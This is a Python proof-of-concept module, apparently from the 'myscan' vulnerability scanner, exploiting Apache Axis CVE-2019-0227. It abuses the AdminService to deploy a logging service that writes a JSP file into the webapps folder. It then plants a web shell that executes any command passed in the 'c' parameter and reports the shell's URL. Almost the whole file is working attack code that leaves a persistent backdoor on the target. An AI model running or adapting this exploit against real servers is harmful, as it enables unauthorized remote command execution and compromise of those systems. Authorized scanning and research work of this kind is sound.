#!/usr/bin/env python3
# @Time    : 2020-05-03
# @Author  : caicai
# @File    : poc_axis_cve-2019-0227_2019.py


from myscan.lib.parse.response_parser import response_parser  ##写了一些操作resonse的方法的类
from myscan.lib.helper.request import request  # 修改了requests.request请求的库，建议使用此库，会在redis计数
from myscan.config import scan_set
from myscan.lib.core.common import get_random_str



class POC():
    def __init__(self, workdata):
        self.dictdata = workdata.get("dictdata")  # python的dict数据，详情请看docs/开发指南Example dict数据示例
        self.url = workdata.get("data")  # self.url为需要测试的url，值为目录url，会以/结尾,如https://www.baidu.com/home/ ,为目录
        self.result = []  # 此result保存dict数据，dict需包含name,url,level,detail字段，detail字段值必须为dict。如下self.result.append代码
        self.name = "axis CVE-2019-0227 rce"
        self.vulmsg = "referer:https://kibodwapon.github.io/2019/07/04/is-1-4-%E8%BF%9C%E7%A8%8B%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8CPOC/"
        self.level = 3  # 0:Low  1:Medium 2:High

    def verify(self):
        # 根据config.py 配置的深度，限定一下目录深度
        if self.url.count("/") > int(scan_set.get("max_dir", 2)) + 2 or self.url.count("/")==3:
            return
        shellname="tomcat"+get_random_str(5)+".jsp"
        path='/'.join(self.url.split("/")[3:])+shellname
        shell = '''<?xml version="1.0" encoding="utf-8"?>
                    <soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
                            xmlns:api="http://127.0.0.1/Integrics/Enswitch/API"
                            xmlns:xsd="http://www.w3.org/2001/XMLSchema"
                            xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
                      <soapenv:Body>
                        <ns1:deployment
                      xmlns="http://xml.apache.org/axis/wsdd/"
                      xmlns:java="http://xml.apache.org/axis/wsdd/providers/java"
                      xmlns:ns1="http://xml.apache.org/axis/wsdd/">
                      <ns1:service name="RandomService" provider="java:RPC">
                        <requestFlow>
                          <handler type="RandomLog"/>
                        </requestFlow>
                        <ns1:parameter name="className" value="java.util.Random"/>
                        <ns1:parameter name="allowedMethods" value="*"/>
                      </ns1:service>
                      <handler name="RandomLog" type="java:org.apache.axis.handlers.LogHandler" >  
                        <parameter name="LogHandler.fileName" value="../webapps/{}" />   
                        <parameter name="LogHandler.writeToConsole" value="false" /> 
                      </handler>
                    </ns1:deployment>
                      </soapenv:Body>
                    </soapenv:Envelope>'''.format(path)
        req = {
            "method": "POST",
            "url": self.url + "services/AdminService",
            "headers": {
                "Content-Type": "application/xml",
                "SOAPAction": "something"
            },
            "data": shell,
            "timeout": 10,
            "allow_redirects": False,
            "verify": False,
        }
        r = request(**req)
        if r != None and r.status_code == 200 and b"</Admin" in r.content:
            write = '''<?xml version="1.0" encoding="utf-8"?>
                    <soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
                    xmlns:api="http://127.0.0.1/Integrics/Enswitch/API"
                    xmlns:xsd="http://www.w3.org/2001/XMLSchema"
                    xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
                    <soapenv:Body>
                    <api:main
                    soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
                        <api:in0><![CDATA[
            <%@page import="java.util.*,java.io.*"%><% if (request.getParameter("c") != null) { Process p = Runtime.getRuntime().exec(request.getParameter("c")); DataInputStream dis = new DataInputStream(p.getInputStream()); String disr = dis.readLine(); while ( disr != null ) { out.println(disr); disr = dis.readLine(); }; p.destroy(); }%>
            ]]>
                        </api:in0>
                    </api:main>
              </soapenv:Body>
            </soapenv:Envelope>'''

            req["url"] = self.url + "services/RandomService"
            req["data"] = write
            r1 = request(**req)
            if r1 != None :
                parser_ = response_parser(r1)
                self.result.append({
                    "name": self.name,
                    "url": self.url,
                    "level": self.level,  # 0:Low  1:Medium 2:High
                    "detail": {
                        "vulmsg": self.vulmsg,
                        "shell:":self.url+shellname+"?c=whoami . show in raw resource",
                        "request": parser_.getrequestraw(),
                        "response": parser_.getresponseraw()
                    }

                })
                return
            self.result.append({
                "name": self.name,
                "url": self.url,
                "level": 0,  # 0:Low  1:Medium 2:High
                "detail": {
                    "vulmsg": self.vulmsg,
                    "others:": "open: "+self.url + "services/AdminService",
                }

            })

